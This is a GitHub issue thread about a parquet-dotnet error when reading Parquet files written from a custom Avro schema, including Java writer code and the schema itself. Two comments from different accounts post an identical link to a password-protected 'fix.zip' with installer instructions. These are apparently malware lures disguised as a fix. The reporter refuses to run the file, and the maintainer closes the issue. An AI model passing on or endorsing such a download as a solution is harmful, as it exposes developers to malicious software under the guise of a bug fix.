### ISSUE TITLE
[BUG]: "don't know how to skip type Set" error

### ISSUE THREAD

**Issue by cetindogu** [aloneguid/parquet-dotnet#544]
### Library Version

4.24.0

### OS

windows 11

### OS Architecture

64 bit

### How to reproduce?

when opening my  parquet file

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cetindogu** [comment]
i am sorry that i can't execute any file !!!!
and what is the problem and what is the solution ???
any way to build fixer form source code?

**Comment by cetindogu** [comment]
15: FIXED_LENGTH_BINARY

**Comment by cetindogu** [comment]
also "14: VOID" 
is not in enum

**Comment by cetindogu** [comment]
even all enums are added as break;

    throw new IOException($"only {read} out of {count} bytes are available");  is thrown

**Comment by aloneguid** [comment]
I'll need more information on how to reproduce this. It definitely works with many files.

**Comment by cetindogu** [comment]
- create a custom .avsc  avro schema file.  and create and instance in type "org.apache.avro.Schema"

SCHEMA = new Schema.Parser().parse(ParquetWriterWrapper.class.getResourceAsStream("/schemas/v2.avsc"));

- use this schema and create a parquet file

for example: (you must change for your own purpose)
        // Read each file and write to a Parquet file
        try (ParquetWriter<GenericRecord> writer = AvroParquetWriter.<GenericRecord>builder(outputFile).withSchema(schema).withConf(confForLocal).withCompressionCodec(CompressionCodecName.ZSTD).withRowGroupSize(256L * 1024 * 1024).build()) {
            for (Path inputPath : inputPaths) {
                InputFile inputFile = HadoopInputFile.fromPath(inputPath, new Configuration());
                try (ParquetReader<GenericRecord> reader = AvroParquetReader.<GenericRecord>builder(inputFile).build()) {
                    GenericRecord genericRecord;
                    while ((genericRecord = reader.read()) != null) {
                        writer.write(genericRecord);
                    }
                }
            }
        }
then try the generated parquet file

please try .avsc file below
{
    "type": "record",
    "name": "LogV1",
    "namespace": "com.cetin.log.v1",
    "doc": "Cetin Data V1",
    "fields": [
        { "name": "column1", "type": ["null", "long"], "default": null },
        { "name": "column2", "type": "string" },
        { "name": "column3", "type": "int"},
        { "name": "column4", "type": "string" },
        { "name": "column5", "type": "int"},
        { "name": "column6", "type": "string" },
        { "name": "column7", "type": ["null", "long"], "default": null },
        { "name": "column8", "type": ["null", "int"], "default": null },
        { "name": "column9", "type": "string" },
        { "name": "column10", "type": "int"},
        { "name": "column11", "type": ["null", "string"], "default": null },
        { "name": "column12", "type": ["null", "string"], "default": null },
        { "name": "column13", "type": ["null", "string"], "default": null },
        { "name": "column14", "type": ["null", "string"], "default": null },
        { "name": "column15", "type": ["null", "string"], "default": null },
        { "name": "column16", "type": "string" },
        { "name": "column17", "type": "string" },
        { "name": "column18", "type": "string" },
        { "name": "column19", "type": "string" },
        { "name": "column20", "type": ["null", "int"], "default": null},
        { "name": "column21", "type": "int"},
        { "name": "column22", "type": ["null", "long"], "default": null},
        { "name": "column23", "type": ["null", "long"], "default": null},
        { "name": "column24", "type": "int"},
        { "name": "column25", "type": "int"},
        { "name": "column26", "type": "string" },
        { "name": "column27", "type": "string" },
        { "name": "column28", "type": "string" }
    ]
}

**Comment by cetindogu** [comment]
parquetWriter = AvroParquetWriter
                    .<GenericData.Record>builder(outputFile)
                    .withSchema(schema)
                    .withConf(new Configuration(false))
                    .withCompressionCodec(CompressionCodecName.ZSTD)
                    .withRowGroupSize(256L * 1024 * 1024) // 256MB
                    .build();

**Comment by aloneguid** [comment]
Closing this, sorry. If you still need it, raise an issue with a reproducible failing test that anyone can run.
